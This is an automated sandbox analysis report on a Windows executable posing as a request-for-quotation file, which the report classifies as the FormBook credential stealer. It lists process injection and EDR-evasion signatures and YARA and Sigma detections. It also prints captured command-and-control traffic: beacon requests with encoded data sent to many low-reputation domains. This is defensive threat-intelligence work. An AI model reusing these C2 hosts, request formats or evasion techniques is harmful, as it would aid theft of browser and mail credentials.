Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ 3100185 MAHAD.exe

Overview

General Information

Sample name:RFQ 3100185 MAHAD.exe
Analysis ID:1555909
MD5:1087c8d5903ea811bab4d2298e756592
SHA1:5e8c9b371d41f125bca99458b3a22472d6225b88
SHA256:0af4e0443ef67307163134b3fb9cbd5454cbfe00bd29ecf57573643be9b5fbd8
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • RFQ 3100185 MAHAD.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe" MD5: 1087C8D5903EA811BAB4D2298E756592)
    • svchost.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • pQIuyzclQg.exe (PID: 6064 cmdline: "C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xcopy.exe (PID: 7824 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
          • pQIuyzclQg.exe (PID: 928 cmdline: "C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8000 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4153059351.0000000003580000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4154874640.0000000004F70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4152996969.0000000003530000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.1959351183.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.4152909168.0000000002A60000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Copy From or To System Directory
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe" , ParentImage: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe, ParentProcessId: 6064, ParentProcessName: pQIuyzclQg.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 7824, ProcessName: xcopy.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", CommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", CommandLine|base64offset|contains: ]4, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", ParentImage: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe, ParentProcessId: 7504, ParentProcessName: RFQ 3100185 MAHAD.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", ProcessId: 7536, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", CommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", CommandLine|base64offset|contains: ]4, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", ParentImage: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe, ParentProcessId: 7504, ParentProcessName: RFQ 3100185 MAHAD.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe", ProcessId: 7536, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: RFQ 3100185 MAHAD.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: RFQ 3100185 MAHAD.exeReversingLabs: Detection: 55%
            Yara detected FormBook
            Source: Yara matchFile source: 00000005.00000002.4153059351.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4154874640.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4152996969.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1959351183.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4152909168.0000000002A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1960343452.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1963116108.0000000007090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4151604059.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: RFQ 3100185 MAHAD.exeJoe Sandbox ML: detected
            Source: RFQ 3100185 MAHAD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: xcopy.pdbUGP source: svchost.exe, 00000001.00000003.1928579132.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1928453654.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1928551112.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, pQIuyzclQg.exe, 00000003.00000002.4152174252.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pQIuyzclQg.exe, 00000003.00000000.1883063288.0000000000F3E000.00000002.00000001.01000000.00000005.sdmp, pQIuyzclQg.exe, 00000007.00000000.2029265327.0000000000F3E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ 3100185 MAHAD.exe, 00000000.00000003.1701564158.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, RFQ 3100185 MAHAD.exe, 00000000.00000003.1704737176.0000000004090000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1860787517.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1858754141.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1959797800.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1959797800.000000000339E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000003.1959723191.000000000363D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.4153371400.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.4153371400.0000000003990000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000003.1962362076.00000000037E2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ 3100185 MAHAD.exe, 00000000.00000003.1701564158.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, RFQ 3100185 MAHAD.exe, 00000000.00000003.1704737176.0000000004090000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1860787517.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1858754141.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1959797800.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1959797800.000000000339E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000003.1959723191.000000000363D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.4153371400.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.4153371400.0000000003990000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000003.1962362076.00000000037E2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xcopy.pdb source: svchost.exe, 00000001.00000003.1928579132.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1928453654.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1928551112.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, pQIuyzclQg.exe, 00000003.00000002.4152174252.0000000000D28000.00000004.00000020.00020000.00000000.sdmp

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.robotcurut.xyz
            Source: Joe Sandbox ViewIP Address: 154.23.181.7 154.23.181.7
            Source: Joe Sandbox ViewIP Address: 141.193.213.11 141.193.213.11
            Source: Joe Sandbox ViewIP Address: 141.193.213.11 141.193.213.11
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /qq33/?n8C0=i6Dk+UJVjxglEXs3yzkq0WHG0TlItVmV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnnUFlXdFi4jtVVDEc70mVXkLEkzZ46s+tlcE=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1Host: www.ila.beautyAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ow7i/?n8C0=D6NwXqVIZVbqudPYhEefTgY6OVxwomDj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GHI6X7o+Jv/ajj5xRJEPvwXTFBId4ErrvEIs=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1Host: www.shintow.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /mdol/?vva=cTUXfXqHQ4cd-Hh0&n8C0=IBR/N437Xoj/lvQ896z8ECWd+LZ6gyFvQ9XvO2IN6lbwsaKUqIYSoc7J5DfSIcjVFUNu75pY4qnkQs5YcPPLjGotBwfrg89x7LGhzGK2QOZbkPmJ4kDXUDQ= HTTP/1.1Host: www.mireela.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /uao9/?n8C0=gsMVmNPJ8N9SSsJigThKyHE8l/ZIDUN0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAQ/tfwzfeb+QiDBGBZgrMbvLdS9fMPgCGa9I=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1Host: www.micrhyms.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /62tt/?vva=cTUXfXqHQ4cd-Hh0&n8C0=2eR3StT9zNfU5ywXH53OhrDvihvJYCZlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg6vEvKVbsoJZtubpb2SwU77vU2H/DTmEUgww= HTTP/1.1Host: www.estrela-b.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zdt7/?n8C0=OdyTsfpKOp+FbfSCrXq4B4jl9EVFsGvs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjApV45c11yxg1NrPYKxfgySb4ZloyON4h3X90=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1Host: www.meanttobebroken.orgAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t2sm/?vva=cTUXfXqHQ4cd-Hh0&n8C0=94IeUqPLX3ZZBpOCZpi27HAmsI+C+yvCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQHI8YLgsovf7r6trIliqKrlGHqlH/IzIJ3iw= HTTP/1.1Host: www.mjmegartravel.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /24sh/?n8C0=M41UUGwRPTDcYYp4CDyQdWj1cPQbgBu2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCR3SUR9gGKPzciSeMUMSO5HA9VQ9I5Ku3b7ko=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1Host: www.energyparks.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /df5c/?vva=cTUXfXqHQ4cd-Hh0&n8C0=iTGQ2f3/8wLaRYQM7RYk7LBI2CmVUG8/oLVVEoegdR+OVsnqcEQj6iurR8BAvDospkEZVkGP6nTG7c6sAiwUtE7HJkZ3OwJdQgVkFyZkHOTqemIeuqLMyHg= HTTP/1.1Host: www.theawareness.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /o5z9/?n8C0=z11/8LNw/ilOmRo6t1owndJPGXSfZ5m9S3jiPj8IKRvMXjps+f+3QxK4x8TDiA3fpLYwxgH4NhA45modVvBwcvPKLBygcSenq44QTqtbBz+XibjMqnFeT20=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1Host: www.ak711ka10.latAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /clyj/?vva=cTUXfXqHQ4cd-Hh0&n8C0=67OLQ/itOzy1KnXwmhg86ePiFTdHKMCP1Q+a3Yqjn3tA475bPQfRHEiawc6HFAwne4/7/Qcre8rqVQWkFmsoAaxQL8wqiLfDevouvJkPhUImbqP6UxWa6D8= HTTP/1.1Host: www.co2cartridges.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2vhi/?n8C0=p2GYxSiN0s6gm9KFXJAq4e6x0wIcQGHvIu1Z7lHSXEw8LLsTZRCMFJnl6mHAS53RhcMtrCoh89iRZIjWsbRt6wLU8XSetM7dmQ1c462L7iOcXWx8c3Lg+VA=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1Host: www.nutrigenfit.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /v22a/?n8C0=EC/A7teyBMYlbVKyOV0wXHPUQ8wRlnuqVuKyKuaI0UjQwLqiy/LDdaUNTXEK/kNNzWxpb7ooCK98wisCyuuE2vBpSiPYpNjY/fBMlzxK1ow9Vo9FDMHmtIo=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1Host: www.binacamasala.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /37zt/?vva=cTUXfXqHQ4cd-Hh0&n8C0=l6jU1h09iQqjeSwPKYuz1pBb0o/w06lG68U0kV9W0wdPoyedT2IMzaad+ev/QDzf4MPOn9Ve63r/J03J+pi+jATvmQ+eVJsL4Kp9LpF4hq/1uKcTc59FKYc= HTTP/1.1Host: www.robotcurut.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.ila.beauty
            Source: global trafficDNS traffic detected: DNS query: www.shintow.net
            Source: global trafficDNS traffic detected: DNS query: www.mireela.pro
            Source: global trafficDNS traffic detected: DNS query: www.micrhyms.info
            Source: global trafficDNS traffic detected: DNS query: www.estrela-b.online
            Source: global trafficDNS traffic detected: DNS query: www.meanttobebroken.org
            Source: global trafficDNS traffic detected: DNS query: www.mjmegartravel.online
            Source: global trafficDNS traffic detected: DNS query: www.energyparks.net
            Source: global trafficDNS traffic detected: DNS query: www.theawareness.shop
            Source: global trafficDNS traffic detected: DNS query: www.ak711ka10.lat
            Source: global trafficDNS traffic detected: DNS query: www.co2cartridges.net
            Source: global trafficDNS traffic detected: DNS query: www.nutrigenfit.online
            Source: global trafficDNS traffic detected: DNS query: www.binacamasala.com
            Source: global trafficDNS traffic detected: DNS query: www.jllllbx.top
            Source: global trafficDNS traffic detected: DNS query: www.robotcurut.xyz
            Source: global trafficDNS traffic detected: DNS query: www.hopeisa.live
            Source: unknownHTTP traffic detected: POST /ow7i/ HTTP/1.1Host: www.shintow.netAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.shintow.netReferer: http://www.shintow.net/ow7i/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 201Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 6e 38 43 30 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 63 33 30 6e 55 61 59 65 6e 52 4e 4b 6e 38 2f 72 58 6d 64 35 67 6d 65 70 45 4a 34 33 71 6d 64 4f 4b 63 2f 6d 30 43 4c 41 63 6b 69 53 56 75 50 41 2b 52 32 67 42 4b 2b 70 6c 64 6c 75 6e 78 52 43 58 57 66 48 52 6e 31 51 4f 75 46 37 76 6d 47 6b 61 75 4c 70 61 74 52 66 48 75 4d 31 58 62 6b 53 34 68 62 4b 36 69 6f 44 4c 48 73 39 78 71 64 67 4c 64 42 7a 4c 5a 46 5a 51 63 42 5a 63 54 4e 65 31 49 2f 70 6a 39 50 67 41 71 38 53 34 71 72 36 6a 68 46 47 63 38 32 56 45 39 2f 75 4a 4d 45 55 4f 73 46 58 56 51 6c 51 4c 57 6b 6c 5a 75 36 4d 48 46 31 44 67 3d 3d Data Ascii: n8C0=O4lQUcptNkK6uc30nUaYenRNKn8/rXmd5gmepEJ43qmdOKc/m0CLAckiSVuPA+R2gBK+pldlunxRCXWfHRn1QOuF7vmGkauLpatRfHuM1XbkS4hbK6ioDLHs9xqdgLdBzLZFZQcBZcTNe1I/pj9PgAq8S4qr6jhFGc82VE9/uJMEUOsFXVQlQLWklZu6MHF1Dg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:28:32 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
